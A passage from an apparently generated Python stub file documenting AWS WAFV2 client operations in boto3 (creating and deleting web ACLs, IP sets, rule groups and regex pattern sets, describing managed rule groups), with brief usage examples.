to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nSpecifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . 
This effectively excludes the rule from acting on web requests.\n\nName (string) -- [REQUIRED]The name of the rule to exclude.\n\n\n\n\n\n\n\n\n\nAction (dict) --The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.\nThis is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nYou must specify either this Action setting or the rule OverrideAction setting, but not both:\n\nIf the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.\nIf the rule statement references a rule group, use the override action setting and not this action setting.\n\n\nBlock (dict) --Instructs AWS WAF to block the web request.\n\nAllow (dict) --Instructs AWS WAF to allow the web request.\n\nCount (dict) --Instructs AWS WAF to count the web request and allow it.\n\n\n\nOverrideAction (dict) --The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .\nSet the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.\nIn a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:\n\nIf the rule statement references a rule group, use this override action setting and not the action setting.\nIf the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.\n\n\nCount (dict) --Override the rule action setting to count.\n\nNone (dict) --Don\'t override the rule action setting.\n\n\n\nVisibilityConfig (dict) -- [REQUIRED]Defines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n\n\n\n\n
:type VisibilityConfig: dict
:param VisibilityConfig: [REQUIRED]\nDefines and enables Amazon CloudWatch metrics and web request sample collection.\n\nSampledRequestsEnabled (boolean) -- [REQUIRED]A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.\n\nCloudWatchMetricsEnabled (boolean) -- [REQUIRED]A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .\n\nMetricName (string) -- [REQUIRED]A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example 'All' and 'Default_Action.' You can\'t change a MetricName after you create a VisibilityConfig .\n\n\n
:type Tags: list
:param Tags: An array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
Returns
Response Syntax
{
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
Response Structure
(dict) --
Summary (dict) --
High-level information about a WebACL , returned by operations like create and list. This provides information such as the ID, which you can use to retrieve and manage a WebACL , and the ARN, which you provide to operations like AssociateWebACL .
Name (string) --
The name of the Web ACL. You cannot change the name of a Web ACL after you create it.
Id (string) --
The unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
Description (string) --
A description of the Web ACL that helps with identification. You cannot change the description of a Web ACL after you create it.
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Summary': {
'Name': 'string',
'Id': 'string',
'Description': 'string',
'LockToken': 'string',
'ARN': 'string'
}
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFUnavailableEntityException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFSubscriptionNotFoundException
WAFV2.Client.exceptions.WAFInvalidOperationException
"""
pass
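# Hedged sketch (not part of the generated stubs): a minimal create_web_acl
# call with a single rule that references a managed rule group, following the
# request syntax documented above. The web ACL name, metric names, and the
# managed rule group identifiers ('AWS' / 'AWSManagedRulesCommonRuleSet') are
# illustrative assumptions; use names returned by
# list_available_managed_rule_groups for your account.
def _example_create_web_acl():
    import boto3
    client = boto3.client('wafv2', region_name='us-east-1')
    response = client.create_web_acl(
        Name='example-web-acl',                  # assumed name
        Scope='REGIONAL',
        DefaultAction={'Allow': {}},             # allow requests no rule matches
        Rules=[
            {
                'Name': 'managed-common-rules',  # assumed rule name
                'Priority': 0,
                'Statement': {
                    'ManagedRuleGroupStatement': {
                        'VendorName': 'AWS',
                        'Name': 'AWSManagedRulesCommonRuleSet',
                    },
                },
                # Rules that reference a rule group take OverrideAction, not Action.
                'OverrideAction': {'None': {}},
                'VisibilityConfig': {
                    'SampledRequestsEnabled': True,
                    'CloudWatchMetricsEnabled': True,
                    'MetricName': 'managedCommonRules',   # assumed metric name
                },
            },
        ],
        VisibilityConfig={
            'SampledRequestsEnabled': True,
            'CloudWatchMetricsEnabled': True,
            'MetricName': 'exampleWebAcl',       # assumed metric name
        },
    )
    # The returned ARN is what you associate with CloudFront, API Gateway, or an ALB.
    return response['Summary']['ARN']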
def delete_firewall_manager_rule_groups(WebACLArn=None, WebACLLockToken=None):
"""
Deletes all rule groups that are managed by AWS Firewall Manager for the specified web ACL.
You can only use this if ManagedByFirewallManager is false in the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_firewall_manager_rule_groups(
WebACLArn='string',
WebACLLockToken='string'
)
:type WebACLArn: string
:param WebACLArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL.\n
:type WebACLLockToken: string
:param WebACLLockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
Returns
Response Syntax
{
'NextWebACLLockToken': 'string'
}
Response Structure
(dict) --
NextWebACLLockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextWebACLLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidOperationException
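A minimal usage sketch is shown below. The web ACL name, ID, and ARN are hypothetical placeholders; the lock token comes from a fresh get_web_acl call, and the web ACL must not be managed by Firewall Manager.
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
# Fetch the web ACL to obtain its ARN and current lock token.
acl = client.get_web_acl(Name='my-web-acl', Scope='REGIONAL', Id='example-web-acl-id')
response = client.delete_firewall_manager_rule_groups(
    WebACLArn=acl['WebACL']['ARN'],
    WebACLLockToken=acl['LockToken']
)
# The response carries the next lock token for follow-up changes to the web ACL.
print(response['NextWebACLLockToken'])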
"""
pass
def delete_ip_set(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
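A minimal sketch, with hypothetical names and IDs; the required lock token is retrieved with get_ip_set immediately before the delete:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
current = client.get_ip_set(Name='my-ip-set', Scope='REGIONAL', Id='example-ip-set-id')
client.delete_ip_set(
    Name='my-ip-set',
    Scope='REGIONAL',
    Id='example-ip-set-id',
    LockToken=current['LockToken']  # must match the latest state of the IP set
)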
"""
pass
def delete_logging_configuration(ResourceArn=None):
"""
Deletes the LoggingConfiguration from the specified web ACL.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_logging_configuration(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the web ACL from which you want to delete the LoggingConfiguration .\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
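A minimal sketch; the web ACL ARN below is a hypothetical placeholder:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
client.delete_logging_configuration(
    ResourceArn='arn:aws:wafv2:us-east-1:123456789012:regional/webacl/my-web-acl/example-web-acl-id'
)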
"""
pass
def delete_permission_policy(ResourceArn=None):
"""
Permanently deletes an IAM policy from the specified rule group.
You must be the owner of the rule group to perform this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_permission_policy(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the rule group from which you want to delete the policy.\nYou must be the owner of the rule group to perform this operation.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
:return: {}
:returns:
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
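A minimal sketch; the rule group ARN is a hypothetical placeholder, and the caller must own the rule group:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
client.delete_permission_policy(
    ResourceArn='arn:aws:wafv2:us-east-1:123456789012:regional/rulegroup/my-rule-group/example-rule-group-id'
)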
"""
pass
def delete_regex_pattern_set(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
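A minimal sketch with hypothetical names and IDs, retrieving a fresh lock token first:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
current = client.get_regex_pattern_set(Name='my-patterns', Scope='REGIONAL', Id='example-set-id')
client.delete_regex_pattern_set(
    Name='my-patterns',
    Scope='REGIONAL',
    Id='example-set-id',
    LockToken=current['LockToken']
)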
"""
pass
def delete_rule_group(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified RuleGroup .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
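A minimal sketch with hypothetical identifiers. It also shows one way to handle WAFAssociatedItemException, which is raised when the rule group is still referenced by a web ACL:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
current = client.get_rule_group(Name='my-rule-group', Scope='REGIONAL', Id='example-rule-group-id')
try:
    client.delete_rule_group(
        Name='my-rule-group',
        Scope='REGIONAL',
        Id='example-rule-group-id',
        LockToken=current['LockToken']
    )
except client.exceptions.WAFAssociatedItemException:
    # Remove the RuleGroupReferenceStatement from any web ACL that uses it, then retry.
    pass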
"""
pass
def delete_web_acl(Name=None, Scope=None, Id=None, LockToken=None):
"""
Deletes the specified WebACL .
You can only use this if ManagedByFirewallManager is false in the specified WebACL .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_web_acl(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the Web ACL. You cannot change the name of a Web ACL after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nThe unique identifier for the Web ACL. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFAssociatedItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
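A minimal sketch that retries once on WAFOptimisticLockException, re-reading the lock token in between; all identifiers are hypothetical:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured

def delete_web_acl_once_retried(name, scope, web_acl_id):
    # Two attempts: if another change lands between the get and the delete, the first
    # attempt fails with WAFOptimisticLockException and we re-fetch the token.
    for _ in range(2):
        lock_token = client.get_web_acl(Name=name, Scope=scope, Id=web_acl_id)['LockToken']
        try:
            client.delete_web_acl(Name=name, Scope=scope, Id=web_acl_id, LockToken=lock_token)
            return
        except client.exceptions.WAFOptimisticLockException:
            continue

delete_web_acl_once_retried('my-web-acl', 'REGIONAL', 'example-web-acl-id')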
"""
pass
def describe_managed_rule_group(VendorName=None, Name=None, Scope=None):
"""
Provides high-level information for a managed rule group, including descriptions of the rules.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_managed_rule_group(
VendorName='string',
Name='string',
Scope='CLOUDFRONT'|'REGIONAL'
)
:type VendorName: string
:param VendorName: [REQUIRED]\nThe name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the managed rule group. You use this, along with the vendor name, to identify the rule group.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Capacity': 123,
'Rules': [
{
'Name': 'string',
'Action': {
'Block': {},
'Allow': {},
'Count': {}
}
},
]
}
Response Structure
(dict) --
Capacity (integer) --
The web ACL capacity units (WCUs) required for this rule group. AWS WAF uses web ACL capacity units (WCU) to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect each rule\'s relative cost. Rule group capacity is fixed at creation, so users can plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
Rules (list) --
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
High-level information about a Rule , returned by operations like DescribeManagedRuleGroup . This provides information like the ID, that you can use to retrieve and manage a RuleGroup , and the ARN, that you provide to the RuleGroupReferenceStatement to use the rule group in a Rule .
Name (string) --
The name of the rule.
Action (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The action that AWS WAF should take on a web request when it matches a rule\'s statement. Settings at the web ACL level can override the rule action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'Capacity': 123,
'Rules': [
{
'Name': 'string',
'Action': {
'Block': {},
'Allow': {},
'Count': {}
}
},
]
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidResourceException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
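A minimal sketch that prints the capacity and rule names of a managed rule group; the vendor and rule group names below are used for illustration:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
response = client.describe_managed_rule_group(
    VendorName='AWS',
    Name='AWSManagedRulesCommonRuleSet',
    Scope='REGIONAL'
)
print('WCUs required:', response['Capacity'])
for rule in response['Rules']:
    # Each entry is a rule summary with the rule name and its default action.
    print(rule['Name'], list(rule.get('Action', {}).keys()))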
"""
pass
def disassociate_web_acl(ResourceArn=None):
"""
Disassociates a Web ACL from a regional application resource. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.
For AWS CloudFront, don\'t use this call. Instead, use your CloudFront distribution configuration. To disassociate a Web ACL, provide an empty web ACL ID in the CloudFront call UpdateDistribution . For information, see UpdateDistribution .
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_web_acl(
ResourceArn='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource to disassociate from the web ACL.\nThe ARN must be in one of the following formats:\n\nFor an Application Load Balancer: ``arn:aws:elasticloadbalancing:region :account-id :loadbalancer/app/load-balancer-name /load-balancer-id ``\nFor an Amazon API Gateway stage: ``arn:aws:apigateway:region ::/restapis/api-id /stages/stage-name ``\n\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
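A minimal sketch for a regional resource; the Application Load Balancer ARN is a hypothetical placeholder:
import boto3

client = boto3.client('wafv2')  # assumes a default region is configured
client.disassociate_web_acl(
    ResourceArn='arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/my-alb/50dc6c495c0c9188'
)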
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_ip_set(Name=None, Scope=None, Id=None):
"""
Retrieves the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.get_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:rtype: dict
ReturnsResponse Syntax
{
'IPSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
'LockToken': 'string'
}
Response Structure
(dict) --
IPSet (dict) --
Name (string) --
The name of the IP set. You cannot change the name of an IPSet after you create it.
Id (string) --
A unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
Description (string) --
A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
IPAddressVersion (string) --
Specify IPV4 or IPV6.
Addresses (list) --
Contains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.
Examples:
To configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .
To configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .
To configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .
For more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .
(string) --
LockToken (string) --
A token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'IPSet': {
'Name': 'string',
'Id': 'string',
'ARN': 'string',
'Description': 'string',
'IPAddressVersion': 'IPV4'|'IPV6',
'Addresses': [
'string',
]
},
